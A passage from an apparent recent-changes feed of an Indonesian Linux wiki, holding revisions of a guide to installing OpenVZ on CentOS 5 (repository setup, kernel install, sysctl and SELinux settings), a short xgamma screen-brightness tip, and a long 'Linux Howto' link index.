 #&lt;br /&gt;
 # Note that you do not have to rerun grub after making changes to this file&lt;br /&gt;
 # NOTICE:  You have a /boot partition.  This means that&lt;br /&gt;
 #          all kernel and initrd paths are relative to /boot/, eg.&lt;br /&gt;
 #          root (hd0,0)&lt;br /&gt;
 #          kernel /vmlinuz-version ro root=/dev/VolGroup00/LogVol00&lt;br /&gt;
 #          initrd /initrd-version.img&lt;br /&gt;
 #boot=/dev/sda&lt;br /&gt;
 default=0&lt;br /&gt;
 timeout=5&lt;br /&gt;
 splashimage=(hd0,0)/grub/splash.xpm.gz&lt;br /&gt;
 hiddenmenu&lt;br /&gt;
 title OpenVZ (2.6.18-274.el5.028stab093.2)&lt;br /&gt;
         root (hd0,0)&lt;br /&gt;
         kernel /vmlinuz-2.6.18-274.el5.028stab093.2 ro root=/dev/VolGroup00/LogVol00 selinux=0&lt;br /&gt;
         initrd /initrd-2.6.18-274.el5.028stab093.2.img&lt;br /&gt;
 title CentOS (2.6.18-274.el5)&lt;br /&gt;
         root (hd0,0)&lt;br /&gt;
         kernel /vmlinuz-2.6.18-274.el5 ro root=/dev/VolGroup00/LogVol00&lt;br /&gt;
         initrd /initrd-2.6.18-274.el5.img &lt;br /&gt;
&lt;br /&gt;
Sekarang install peralatan untuk pengguna OpenVZ:&lt;br /&gt;
&lt;br /&gt;
 yum install vzctl vzquota&lt;br /&gt;
&lt;br /&gt;
Buka /etc/sysctl.conf dan pastikan konfigurasinya seperti di bawah ini:&lt;br /&gt;
&lt;br /&gt;
 vi /etc/sysctl.conf&lt;br /&gt;
 &lt;br /&gt;
 [...]&lt;br /&gt;
 net.ipv4.ip_forward = 1&lt;br /&gt;
 net.ipv4.conf.default.proxy_arp = 0&lt;br /&gt;
 net.ipv4.conf.all.rp_filter = 1&lt;br /&gt;
 kernel.sysrq = 1&lt;br /&gt;
 net.ipv4.conf.default.send_redirects = 1&lt;br /&gt;
 net.ipv4.conf.all.send_redirects = 0&lt;br /&gt;
 net.ipv4.icmp_echo_ignore_broadcasts=1&lt;br /&gt;
 net.ipv4.conf.default.forwarding=1&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Jika IP Address yang akan anda gunakan pada VPS anda menggunakan subnet yang berbeda dengan IP Address milik host system, maka anda wajib melakukan perubahan pada vz.conf seperti di bawah ini:&lt;br /&gt;
&lt;br /&gt;
Buka /etc/vz/vz.conf dan set NEIGHBOUR_DEVS ke all:&lt;br /&gt;
&lt;br /&gt;
 vi /etc/vz/vz.conf&lt;br /&gt;
 &lt;br /&gt;
 [...]&lt;br /&gt;
 NEIGHBOUR_DEVS=all&lt;br /&gt;
 [...] &lt;br /&gt;
&lt;br /&gt;
SELinux harus dimatikan jika anda ingin menggunakan OpenVZ. Buka /etc/sysconfig/selinux dan set nilai dari SELINUX ke disabled:&lt;br /&gt;
&lt;br /&gt;
 vi /etc/sysconfig/selinux &lt;br /&gt;
 &lt;br /&gt;
 # This file controls the state of SELinux on the system.&lt;br /&gt;
 # SELINUX= can take one of these three values:&lt;br /&gt;
 #       enforcing - SELinux security policy is enforced.&lt;br /&gt;
 #       permissive - SELinux prints warnings instead of enforcing.&lt;br /&gt;
 #       disabled - SELinux is fully disabled.&lt;br /&gt;
 SELINUX=disabled&lt;br /&gt;
 # SELINUXTYPE= type of policy in use. Possible values are:&lt;br /&gt;
 #       targeted - Only targeted network daemons are protected.&lt;br /&gt;
 #       strict - Full SELinux protection.&lt;br /&gt;
 SELINUXTYPE=targeted &lt;br /&gt;
&lt;br /&gt;
Langkah terakhir adalah reboot server anda:&lt;br /&gt;
&lt;br /&gt;
 reboot&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
* http://www.howtoforge.com/installing-and-using-openvz-on-centos-5.7&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Linux HowTo]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_OpenVZ_di_CentOS_5&amp;diff=38697</id>
		<title>Instalasi OpenVZ di CentOS 5</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Instalasi_OpenVZ_di_CentOS_5&amp;diff=38697"/>
		<updated>2013-11-12T11:56:22Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: ==Instalasi OpenVZ==  Tambahkan repository OpenVZ ke yum:   cd /etc/yum.repos.d  wget http://download.openvz.org/openvz.repo  rpm --import http://download.openvz.org/RPM-GPG-Key-OpenVZ  Bu...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Instalasi OpenVZ==&lt;br /&gt;
&lt;br /&gt;
Tambahkan repository OpenVZ ke yum:&lt;br /&gt;
&lt;br /&gt;
 cd /etc/yum.repos.d&lt;br /&gt;
 wget http://download.openvz.org/openvz.repo&lt;br /&gt;
 rpm --import http://download.openvz.org/RPM-GPG-Key-OpenVZ&lt;br /&gt;
&lt;br /&gt;
Buka openvz.repo&lt;br /&gt;
&lt;br /&gt;
 vi openvz.repo&lt;br /&gt;
&lt;br /&gt;
Matikan repository [openvz-kernel-rhel6] (enabled=0) dan hidupkan repository [openvz-kernel-rhel5] (enabled=1):&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 [openvz-kernel-rhel6]&lt;br /&gt;
 name=OpenVZ RHEL6-based kernel&lt;br /&gt;
 #baseurl=http://download.openvz.org/kernel/branches/rhel6-2.6.32/current/&lt;br /&gt;
 mirrorlist=http://download.openvz.org/kernel/mirrors-rhel6-2.6.32&lt;br /&gt;
 enabled=0&lt;br /&gt;
 gpgcheck=1&lt;br /&gt;
 gpgkey=http://download.openvz.org/RPM-GPG-Key-OpenVZ&lt;br /&gt;
 &lt;br /&gt;
 [openvz-kernel-rhel5]&lt;br /&gt;
 name=OpenVZ RHEL5-based kernel&lt;br /&gt;
 #baseurl=http://download.openvz.org/kernel/branches/rhel5-2.6.18/current/&lt;br /&gt;
 mirrorlist=http://download.openvz.org/kernel/mirrors-rhel5-2.6.18&lt;br /&gt;
 enabled=1&lt;br /&gt;
 gpgcheck=1&lt;br /&gt;
 gpgkey=http://download.openvz.org/RPM-GPG-Key-OpenVZ&lt;br /&gt;
 &lt;br /&gt;
 [openvz-kernel-rhel4]&lt;br /&gt;
 name=OpenVZ RHEL4-based kernel&lt;br /&gt;
 #baseurl=http://download.openvz.org/kernel/branches/rhel4-2.6.9/current/&lt;br /&gt;
 mirrorlist=http://download.openvz.org/kernel/mirrors-rhel4-2.6.9&lt;br /&gt;
 enabled=0&lt;br /&gt;
 gpgcheck=1&lt;br /&gt;
 gpgkey=http://download.openvz.org/RPM-GPG-Key-OpenVZ&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
Cari kernel yang sesuai dengan mesin anda&lt;br /&gt;
&lt;br /&gt;
 yum search ovzkernel&lt;br /&gt;
&lt;br /&gt;
Hasilnya:&lt;br /&gt;
&lt;br /&gt;
 [root@server1 yum.repos.d]# yum search vzkernel&lt;br /&gt;
 ...&lt;br /&gt;
 ovzkernel.i686 : Virtuozzo Linux kernel (the core of the Linux operating system)&lt;br /&gt;
 ovzkernel.x86_64 : Virtuozzo Linux kernel (the core of the Linux operating system)&lt;br /&gt;
 ovzkernel-PAE.i686 : The Linux kernel compiled for PAE capable machines.&lt;br /&gt;
 ovzkernel-PAE-devel.i686 : Development package for building kernel modules to match the PAE kernel.&lt;br /&gt;
 ovzkernel-devel.i686 : Development package for building kernel modules to match the kernel.&lt;br /&gt;
 ovzkernel-devel.x86_64 : Development package for building kernel modules to match the kernel.&lt;br /&gt;
 ovzkernel-ent.i686 : The Linux kernel compiled for huge mem capable machines.&lt;br /&gt;
 ovzkernel-ent-devel.i686 : Development package for building kernel modules to match the ent kernel.&lt;br /&gt;
 ovzkernel-xen.i686 : The Linux kernel compiled for Xen VM operations&lt;br /&gt;
 ovzkernel-xen.x86_64 : The Linux kernel compiled for Xen VM operations&lt;br /&gt;
 ovzkernel-xen-devel.i686 : Development package for building kernel modules to match the kernel.&lt;br /&gt;
 ovzkernel-xen-devel.x86_64 : Development package for building kernel modules to match the kernel.&lt;br /&gt;
 [root@server1 yum.repos.d]#&lt;br /&gt;
&lt;br /&gt;
Pilih salah satu yang sesuai dengan arsitektur mesin anda&lt;br /&gt;
&lt;br /&gt;
Pada sistem x86_64:&lt;br /&gt;
&lt;br /&gt;
 yum install ovzkernel.x86_64&lt;br /&gt;
&lt;br /&gt;
Pada sistem i686:&lt;br /&gt;
&lt;br /&gt;
 yum install ovzkernel.i686&lt;br /&gt;
&lt;br /&gt;
Secara otomatis GRUB bootloader akan terupdate. Silahkan buka /boot/grub/menu.lst untuk memastikan OpenVZ kernel berada di posisi paling atas dibanding kernel yang lain&lt;br /&gt;
&lt;br /&gt;
 cat /boot/grub/menu.lst&lt;br /&gt;
 &lt;br /&gt;
 # grub.conf generated by anaconda&lt;br /&gt;
 #&lt;br /&gt;
 # Note that you do not have to rerun grub after making changes to this file&lt;br /&gt;
 # NOTICE:  You have a /boot partition.  This means that&lt;br /&gt;
 #          all kernel and initrd paths are relative to /boot/, eg.&lt;br /&gt;
 #          root (hd0,0)&lt;br /&gt;
 #          kernel /vmlinuz-version ro root=/dev/VolGroup00/LogVol00&lt;br /&gt;
 #          initrd /initrd-version.img&lt;br /&gt;
 #boot=/dev/sda&lt;br /&gt;
 default=0&lt;br /&gt;
 timeout=5&lt;br /&gt;
 splashimage=(hd0,0)/grub/splash.xpm.gz&lt;br /&gt;
 hiddenmenu&lt;br /&gt;
 title OpenVZ (2.6.18-274.el5.028stab093.2)&lt;br /&gt;
         root (hd0,0)&lt;br /&gt;
         kernel /vmlinuz-2.6.18-274.el5.028stab093.2 ro root=/dev/VolGroup00/LogVol00 selinux=0&lt;br /&gt;
         initrd /initrd-2.6.18-274.el5.028stab093.2.img&lt;br /&gt;
 title CentOS (2.6.18-274.el5)&lt;br /&gt;
         root (hd0,0)&lt;br /&gt;
         kernel /vmlinuz-2.6.18-274.el5 ro root=/dev/VolGroup00/LogVol00&lt;br /&gt;
         initrd /initrd-2.6.18-274.el5.img &lt;br /&gt;
&lt;br /&gt;
Sekarang install peralatan untuk pengguna OpenVZ:&lt;br /&gt;
&lt;br /&gt;
 yum install vzctl vzquota&lt;br /&gt;
&lt;br /&gt;
Buka /etc/sysctl.conf dan pastikan konfigurasinya seperti di bawah ini:&lt;br /&gt;
&lt;br /&gt;
 vi /etc/sysctl.conf&lt;br /&gt;
 &lt;br /&gt;
 [...]&lt;br /&gt;
 net.ipv4.ip_forward = 1&lt;br /&gt;
 net.ipv4.conf.default.proxy_arp = 0&lt;br /&gt;
 net.ipv4.conf.all.rp_filter = 1&lt;br /&gt;
 kernel.sysrq = 1&lt;br /&gt;
 net.ipv4.conf.default.send_redirects = 1&lt;br /&gt;
 net.ipv4.conf.all.send_redirects = 0&lt;br /&gt;
 net.ipv4.icmp_echo_ignore_broadcasts=1&lt;br /&gt;
 net.ipv4.conf.default.forwarding=1&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Jika IP Address yang akan anda gunakan pada VPS anda menggunakan subnet yang berbeda dengan IP Address milik host system, maka anda wajib melakukan perubahan pada vz.conf seperti di bawah ini:&lt;br /&gt;
&lt;br /&gt;
Buka /etc/vz/vz.conf dan set NEIGHBOUR_DEVS ke all:&lt;br /&gt;
&lt;br /&gt;
 vi /etc/vz/vz.conf&lt;br /&gt;
 &lt;br /&gt;
 [...]&lt;br /&gt;
 NEIGHBOUR_DEVS=all&lt;br /&gt;
 [...] &lt;br /&gt;
&lt;br /&gt;
SELinux harus dimatikan jika anda ingin menggunakan OpenVZ. Buka /etc/sysconfig/selinux dan set nilai dari SELINUX ke disabled:&lt;br /&gt;
&lt;br /&gt;
 vi /etc/sysconfig/selinux &lt;br /&gt;
 &lt;br /&gt;
 # This file controls the state of SELinux on the system.&lt;br /&gt;
 # SELINUX= can take one of these three values:&lt;br /&gt;
 #       enforcing - SELinux security policy is enforced.&lt;br /&gt;
 #       permissive - SELinux prints warnings instead of enforcing.&lt;br /&gt;
 #       disabled - SELinux is fully disabled.&lt;br /&gt;
 SELINUX=disabled&lt;br /&gt;
 # SELINUXTYPE= type of policy in use. Possible values are:&lt;br /&gt;
 #       targeted - Only targeted network daemons are protected.&lt;br /&gt;
 #       strict - Full SELinux protection.&lt;br /&gt;
 SELINUXTYPE=targeted &lt;br /&gt;
&lt;br /&gt;
Langkah terakhir adalah reboot server anda:&lt;br /&gt;
&lt;br /&gt;
 reboot&lt;br /&gt;
&lt;br /&gt;
==Referensi==&lt;br /&gt;
* http://www.howtoforge.com/installing-and-using-openvz-on-centos-5.7&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [Linux HowTo]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Mengatur_Kecerahan_Layar_Di_Linux&amp;diff=36624</id>
		<title>Mengatur Kecerahan Layar Di Linux</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Mengatur_Kecerahan_Layar_Di_Linux&amp;diff=36624"/>
		<updated>2013-04-12T16:14:00Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Pranala Menarik */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Biasanya setiap monitor komputer mempunyai tombol untuk mengatur kecerahan/brightness. Untuk beberapa tipe monitor, monitor tetap terlalu cerah walaupun sudah dikonfigurasi ke kecerahan/brightness yang paling rendah. Cara termudah untuk mengakali ini adalah dengan mengubah value gamma di mesin [[Linux]] kita memakai perintah xgamma.&lt;br /&gt;
Value standar adalah 1. Untuk membuat monitor kita semakin redup, kita set ke value yang lebih rendah, misalkan saja 0.7&lt;br /&gt;
&lt;br /&gt;
 sudo xgamma -gamma 0.7&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* [[Linux Howto]]&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Mengatur_Kecerahan_Layar_Di_Linux&amp;diff=36623</id>
		<title>Mengatur Kecerahan Layar Di Linux</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Mengatur_Kecerahan_Layar_Di_Linux&amp;diff=36623"/>
		<updated>2013-04-12T16:13:43Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: New page: Biasanya setiap monitor komputer mempunyai tombol untuk mengatur kecerahan/brightness. Untuk beberapa tipe monitor, monitor tetap terlalu cerah walaupun sudah dikonfigurasi ke kecerahan/br...&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Biasanya setiap monitor komputer mempunyai tombol untuk mengatur kecerahan/brightness. Untuk beberapa tipe monitor, monitor tetap terlalu cerah walaupun sudah dikonfigurasi ke kecerahan/brightness yang paling rendah. Cara termudah untuk mengakali ini adalah dengan mengubah value gamma di mesin [[Linux]] kita memakai perintah xgamma.&lt;br /&gt;
Value standar adalah 1. Untuk membuat monitor kita semakin redup, kita set ke value yang lebih rendah, misalkan saja 0.7&lt;br /&gt;
&lt;br /&gt;
 sudo xgamma -gamma 0.7&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Pranala Menarik==&lt;br /&gt;
* Linux Howto&lt;/div&gt;</summary>
		<author><name>Adinugroho</name></author>
	</entry>
	<entry>
		<id>https://lms.onnocenter.or.id/wiki/index.php?title=Linux_Howto&amp;diff=36622</id>
		<title>Linux Howto</title>
		<link rel="alternate" type="text/html" href="https://lms.onnocenter.or.id/wiki/index.php?title=Linux_Howto&amp;diff=36622"/>
		<updated>2013-04-12T16:13:16Z</updated>

		<summary type="html">&lt;p&gt;Adinugroho: /* Lain-lain */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Non-Teknis==&lt;br /&gt;
&lt;br /&gt;
* [[Beberapa kisah penggunaan Open Source Software]]&lt;br /&gt;
* [http://infolinux.or.id/category/lowongan/ Lowongan Kerja Linux]&lt;br /&gt;
* [[Strategi Migrasi Windows ke Linux]]&lt;br /&gt;
* [[Alternatif Open Source juga untuk Windows]]&lt;br /&gt;
* [[Tempat Memperoleh ISO / CD / DVD Linux]]&lt;br /&gt;
* [[Majalah Linux]]&lt;br /&gt;
* [[Beberapa Distro Linux Indonesia]]&lt;br /&gt;
* [[ReactOS - Windows yang Bukan Windows]]&lt;br /&gt;
* [[Membantu Terjemahkan Linux ke Bahasa Indonesia]]&lt;br /&gt;
* [[Open Source, Open Mind dan Open Concept]]&lt;br /&gt;
* [[Mengenal Varian Distro-Distro Linux]]&lt;br /&gt;
&lt;br /&gt;
==Manual / Panduan / Dokumentasi==&lt;br /&gt;
&lt;br /&gt;
* http://linux2.arinet.org - register untuk men-download dokumentasi.&lt;br /&gt;
* http://buaya.klas.or.id/pub/ebook-debian/ - buku Debian&lt;br /&gt;
* http://www.aboutdebian.com/ - buku Debian&lt;br /&gt;
* http://www.linux.or.id&lt;br /&gt;
* http://www.ubuntu-id.org&lt;br /&gt;
* http://slackware.linux.or.id/slackbook/&lt;br /&gt;
* https://wiki.ubuntu.com/BeginnersTeam - buku untuk pemula&lt;br /&gt;
&lt;br /&gt;
* [http://wiki.ubuntu-id.org/PanduanUbuntu Panduan Ubuntu Bahasa Indonesia]&lt;br /&gt;
* [http://wiki.ubuntu-id.org/BlankOn/Dokumentasi/ Panduan BlankOn Bahasa Indonesia]&lt;br /&gt;
* [http://www.ubuntu-id.org/doc/edgy/ubuntu/desktopguide/id/index.html Ubuntu Desktop Guide Bahasa Indonesia]&lt;br /&gt;
* [http://www.ubuntu-id.org/doc/edgy/kubuntu/desktopguide/id/index.html Kubuntu Desktop Guide Bahasa Indonesia]&lt;br /&gt;
* [http://www.ubuntu-id.org/doc/edgy/xubuntu/desktopguide/id/index.html Xubuntu Desktop Guide Bahasa Indonesia]&lt;br /&gt;
* [https://help.ubuntu.com/6.10/ubuntu/serverguide/C/index.html Ubuntu Server Guide Bahasa Indonesia]&lt;br /&gt;
* [http://www.ubuntu-id.org/doc/edgy/ubuntu/packagingguide/id/index.html Ubuntu Packaging Guide Bahasa Indonesia]&lt;br /&gt;
* http://ubuntu-indonesia.com/forums/ubbthreads.php/topics/18006/1&lt;br /&gt;
* http://ubuntulinux.or.id/blog/2010/04/14/ubuntu-electronics-remix/&lt;br /&gt;
* http://ubuntu-indonesia.com/forums/ubbthreads.php/topics/18006/Ebook_sudah_bisa_dinikmati_har#Post18006&lt;br /&gt;
* http://ubuntu-indonesia.com/public/InstalasiUbuntuDesktop10.04.LTS.pdf.zip&lt;br /&gt;
* http://ubuntu-indonesia.com/public/DesktopEnviroinment.pdf.zip&lt;br /&gt;
* http://ubuntu-indonesia.com/public/OptimalisasiUbuntuLinux.pdf.zip&lt;br /&gt;
* http://ubuntu-indonesia.com/public/Tips&amp;amp;TrikUbuntu.pdf.zip&lt;br /&gt;
* http://ubuntu-indonesia.com/public/BerinternetdenganUbuntu.pdf.zip&lt;br /&gt;
* [[Mengenal Varian Distro-Distro Linux]]&lt;br /&gt;
* http://en.m.wikipedia.org/wiki/Comparison_of_Windows_and_Linux?wasRedirected=true&lt;br /&gt;
* http://www.whylinuxisbetter.net/index_id.php?lang=id&lt;br /&gt;
* http://elco.teknikelektronika.net/&lt;br /&gt;
* http://replayfrom.wordpress.com/full-circle-magazine/&lt;br /&gt;
* http://ubuntuguide.org/wiki/Ubuntu:Maverick&lt;br /&gt;
* http://tutorial.jaringankantor.com/&lt;br /&gt;
* http://souptonuts.sourceforge.net/how_to_linux_and_open_source.htm&lt;br /&gt;
&lt;br /&gt;
==Instalasi Linux==&lt;br /&gt;
&lt;br /&gt;
===[[SourceForge Open Source di Indonesia]]===&lt;br /&gt;
&lt;br /&gt;
===[[System Operasi Muslim]]===&lt;br /&gt;
&lt;br /&gt;
===[[Sabily ID]]===&lt;br /&gt;
&lt;br /&gt;
===Instalasi Linux===&lt;br /&gt;
* [[Situs untuk Download ISO Linux]]&lt;br /&gt;
* [[check md5 checksum]]&lt;br /&gt;
* [[Partisi Harddisk Menggunakan fdisk]]&lt;br /&gt;
* http://replayfrom.wordpress.com/2011/01/01/ubuntu-partisi-untuk-ubuntu/&lt;br /&gt;
* [[Instalasi Ubuntu]]&lt;br /&gt;
* [[Instalasi Ubuntu 10.10 Server]]&lt;br /&gt;
* [[Instalasi Dual Boot]]&lt;br /&gt;
* [[Instalasi xcode ke harddisk / usb]]&lt;br /&gt;
* [http://danubudi.web.id/sistem-direktori-linux-dan-model-partisi/ Sistem Direktori Linux dan Model Partisi]&lt;br /&gt;
* [http://wiki.ubuntu-id.org/BlankOn/Dokumentasi/Pengguna/PanduanInstalasi Panduan Instalasi BlankOn]&lt;br /&gt;
* [http://firstly.wordpress.com/2008/02/16/installasi-slackware-buat-pemula-banget/ Instalasi Slackware buat Pemula banget]&lt;br /&gt;
* [[Menginstall Gyachi di Linux]]&lt;br /&gt;
* [[Membersihkan (purge &amp;amp; clean) paket Debian yang pernah di install]]&lt;br /&gt;
* [[Distro SchoolOnffLine]]&lt;br /&gt;
* http://numpanglewat.wordpress.com/2008/08/20/cara-flash-usb-live-installasi-and-remastering-of-slax/&lt;br /&gt;
* [[Membuat MultiLinux di sebuah komputer]]&lt;br /&gt;
* [[Merubah tampilan boot grube menu ubuntu mengunakan foto sendiri]]&lt;br /&gt;
* [[Menggunakan tasksel untuk memudahkan instalasi tambahan paket]]&lt;br /&gt;
* [[Cek versi Ubuntu yang terinstall]]&lt;br /&gt;
* [[Instalasi Aplikasi di Linux]]&lt;br /&gt;
* [[Instalasi Linux - Layar VGA tidak keluar apa-apa? atau kacau]]&lt;br /&gt;
* [[Instalasi Linux FAQ - WiFi card tidak terdetek?]]&lt;br /&gt;
* [[Ganti Splash Screen Ubuntu]]&lt;br /&gt;
* [[Cara mengembalikan ikon wireless di sebelah kanan atas desktop ubuntu]]&lt;br /&gt;
* [[Reset password root]]&lt;br /&gt;
* [[Instalasi NVIDIA – Driver Pada Ubuntu 10.04 (Lucid) LTS + Tips &amp;amp; Trick]]&lt;br /&gt;
* [[Upgrade versi semua aplikasi ke versi yang lebih baru]]&lt;br /&gt;
* http://en.wikipedia.org/wiki/Comparison_of_file_systems - Perbandingan [[System Operasi]]&lt;br /&gt;
* [[Apt-proz: Apt-fast dengan Engine ProZilla]]&lt;br /&gt;
* [[Grub]]&lt;br /&gt;
* [[Menaikkan Nilai APT::Cache-Limit]]&lt;br /&gt;
* [[Membuat Installer deb dari sebuah aplikasi]]&lt;br /&gt;
* http://bloglinux-patenpisan.blogspot.com/2011/09/ubuntu-mengupdate-sistem-ubuntu-secara.html&lt;br /&gt;
&lt;br /&gt;
====Data Recovery Partisi yang Terformat====&lt;br /&gt;
* [[Recovery data harddisk yang terformat]]&lt;br /&gt;
* [[Memperbaiki Partisi dan Recovery File]]&lt;br /&gt;
* [[Booting Linux, Fsck terus yang bikin frustasi]]&lt;br /&gt;
&lt;br /&gt;
====Memperbaiki Grub / NTLDR====&lt;br /&gt;
* [[NTLDR Missing]]&lt;br /&gt;
* [[Mengembalikan / Rescue GRUB]]&lt;br /&gt;
* [[Rescue GRUB sesudah update kernel]]&lt;br /&gt;
* [[Solusi Tidak Bisa Booting pada Linux Ubuntu 10.04]]&lt;br /&gt;
* [[Mengembalikan bootloader Ubuntu yang hilang setelah install Windows]]&lt;br /&gt;
&lt;br /&gt;
===Instalasi LiveUSB===&lt;br /&gt;
* [[Membuat LiveUSB]]&lt;br /&gt;
* [[Penggunaan Unetbootin]]&lt;br /&gt;
* [[Membuat Installer Ubuntu di USB FlashDisk menjadi LiveUSB]]&lt;br /&gt;
** [[Install Ubuntu 7.10 Dari USB Flashdisk]]&lt;br /&gt;
** [http://firstly.wordpress.com/2008/07/24/membuat-ubuntu-804-live-usb/ Membuat Ubuntu 8.04 LiveUSB]&lt;br /&gt;
** [[Membuat LiveUSB dari Ubuntu Desktop]]&lt;br /&gt;
* [[Membuat Installan Ubuntu Remix]]&lt;br /&gt;
* [[Install Ubuntu via USB memakai plop boot manager di PC yang tidak ada opsi booting via USB]]&lt;br /&gt;
&lt;br /&gt;
===[[Repository]]===&lt;br /&gt;
* http://repogen.simplylinux.ch/ - Generate sources.list automatis :)&lt;br /&gt;
* [[Contoh isi file /etc/sources.list di Ubuntu]]&lt;br /&gt;
* [[Daftar Repository Ubuntu]]&lt;br /&gt;
* [http://wiki.ubuntu-id.org/DistribusiDvdReposUbuntu Distribusi DVD Repository Ubuntu]&lt;br /&gt;
* [http://www.debian.org/mirror/ftpmirror Setting up a Debian archive mirror]&lt;br /&gt;
* [[Membuat Repository Ubuntu Lokal]]&lt;br /&gt;
* [[Membuat Repository Ubuntu Lokal tanpa SERVER]]&lt;br /&gt;
* [[Membuat Repository Ubuntu Lokal dari hasil Download Repository]]&lt;br /&gt;
* [[Membuat Repository Ubuntu Lokal menggunakan debmirror]]&lt;br /&gt;
* [[Membuat Repository Debian Lokal menggunakan debmirror]]&lt;br /&gt;
* [[Membuat Repository Ubuntu Lokal menggunakan NAS]]&lt;br /&gt;
* [[Membuat Mirrorkeyring untuk debmirror]]&lt;br /&gt;
* [[Backtrack: Membuat Repository Backtrack menggunakan debmirror]]&lt;br /&gt;
* [[Mengcompile Ulang Repository Ubuntu]]&lt;br /&gt;
* [[Membuat Beberapa Repository Lokal di Satu Mesin]]&lt;br /&gt;
* [http://surabaya.linux.or.id/archives/2008/07/09/membuat-mirror-ubuntu-dengan-debmirror.html Membuat Mirror Ubuntu dengan debmirror]&lt;br /&gt;
* [http://surabaya.linux.or.id/archives/2008/03/02/membuat-dvd-repository-debianubuntu.html Membuat DVD Repository Debian Ubuntu]&lt;br /&gt;
* [[Membuat Repository Menggunakan APTonCD]]&lt;br /&gt;
* [[Mengenalkan DVD Repository ke Ubuntu]]&lt;br /&gt;
* [[Membuat Mirror Ubuntu di DVD]]&lt;br /&gt;
* [[Script Sedot untuk Mirroring Repo]]&lt;br /&gt;
* [[Error Could not get lock waktu update repository]]&lt;br /&gt;
* [[Error apt get update dynamic mmap ran out of room]]&lt;br /&gt;
* [[GPG error NO PUBLIC KEY dari launchpad]]&lt;br /&gt;
&lt;br /&gt;
===[[Remastering Ubuntu]]===&lt;br /&gt;
* [[Distro SchoolOnffLine]]&lt;br /&gt;
* [[Distro SMEOnffLine]]&lt;br /&gt;
* [[Distro ORARINux]]&lt;br /&gt;
* [[Distro SekolahNux]]&lt;br /&gt;
* [[Distro IPTEKNux]]&lt;br /&gt;
* [[Remastering Fedora dengan Revisor]]&lt;br /&gt;
&lt;br /&gt;
===Konfigurasi Desktop===&lt;br /&gt;
&lt;br /&gt;
* [[gconftool-2 untuk mengkonfigurasi gnome desktop]]&lt;br /&gt;
* http://www.ubuntu-art.org - tempat [[Wallpaper]], Art Ubuntu &#039;&#039;&#039;(Recommended)&#039;&#039;&#039;&lt;br /&gt;
* http://www.gnome-look.org/&lt;br /&gt;
** [[Beberapa Theme Mirip XP]]&lt;br /&gt;
* http://www.howtoforge.com/mac4lin_make_linux_look_like_a_mac - Agar [[Linux]] bertampilan Mac.&lt;br /&gt;
* http://pujanggaitusudahmati.wordpress.com/2010/03/10/instalasi-ubuntu-studio-theme-pada-ubuntu-karmic/&lt;br /&gt;
* [[xorg.conf untuk mereka yang menggunakan Sis]]&lt;br /&gt;
* [[Instalasi Sis 771/671]]&lt;br /&gt;
* http://pujanggaitusudahmati.wordpress.com/2010/05/02/cara-merubah-window-control-position-ubuntu-lucid/&lt;br /&gt;
* http://omnialinux.com/omniaxp/ - Linux yang mirip banget dengan XP&lt;br /&gt;
* http://www.omgubuntu.co.uk/2010/07/one-stop-shop-for-ubuntu-customization.html&lt;br /&gt;
* [[Menambahkan atau Mengubah Bahasa di Ubuntu]]&lt;br /&gt;
* [[Network Manager Icon Hilang dari Gnome]]&lt;br /&gt;
&lt;br /&gt;
===[[Linux Benchmarking]]===&lt;br /&gt;
&lt;br /&gt;
===Lain lain===&lt;br /&gt;
* [[Linux XP]]&lt;br /&gt;
* [[Backup Harddisk dan Cloning Komputer]]&lt;br /&gt;
* [[Mengembalikan / Rescue GRUB]]&lt;br /&gt;
* [[Ganti Motherboard dengan Harddisk Linux yang sama]]&lt;br /&gt;
* [[Ghost for Linux]]&lt;br /&gt;
* [[Konversi file .bin / .cue ke .iso di Ubuntu]]&lt;br /&gt;
* http://ubuntuforums.org/showthread.php?t=417761 - Recovery Data yang Hilang.&lt;br /&gt;
* [[Cek / memperbaiki partisi harddisk]]&lt;br /&gt;
* [[Disk Quota]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Driver===&lt;br /&gt;
Kadang kala ada driver / card yang tidak terdeteksi di [[Linux]]. Mungkin ada baiknya mencoba cara berikut ini&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;[[Teknik Deteksi Driver Automatis di Ubuntu]] - cara paling manjur&#039;&#039;&#039;&lt;br /&gt;
* [[Driver dan CODEC untuk Multimedia di Linux]]&lt;br /&gt;
* [[Penggunaan driver Windows dengan ndiswrapper]]&lt;br /&gt;
* http://ubuntu-semarang.org/blog/2007/11/solusi-ubuntu-untuk-acer-4520/&lt;br /&gt;
* [[D-link DWA-110 Driver untuk Ubuntu]]&lt;br /&gt;
* [[Instalasi Adobe Flash Player]]&lt;br /&gt;
